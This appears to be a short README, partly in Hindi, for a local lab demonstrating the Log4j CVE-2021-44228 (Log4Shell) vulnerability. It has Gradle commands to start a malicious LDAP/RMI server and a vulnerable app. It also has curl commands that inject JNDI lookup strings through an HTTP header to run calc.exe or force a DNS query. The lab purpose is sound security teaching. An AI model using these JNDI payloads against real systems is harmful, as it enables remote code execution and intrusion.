
Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...
एक असुरक्षित JDK का उपयोग करें, उदाहरण के लिए JDK 1.8.0_181
दुर्भावनापूर्ण सर्वर निम्नलिखित एंडपॉइंट तैनात करता है:
./gradlew :malicious-server:bootRun
असुरक्षित एप्लिकेशन 8082 पर एक HTTP एंडपॉइंट तैनात करता है
./gradlew :vulnerable-app:bootRun
एक पेलोड चुनें जिसे असुरक्षित एप्लिकेशन द्वारा निष्पादित किया जाएगा और उसे Base64 में एन्कोड करें। उदाहरण के लिए, कैलकुलेटर खोलने के लिए
विंडोज़ में: calc.exe
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/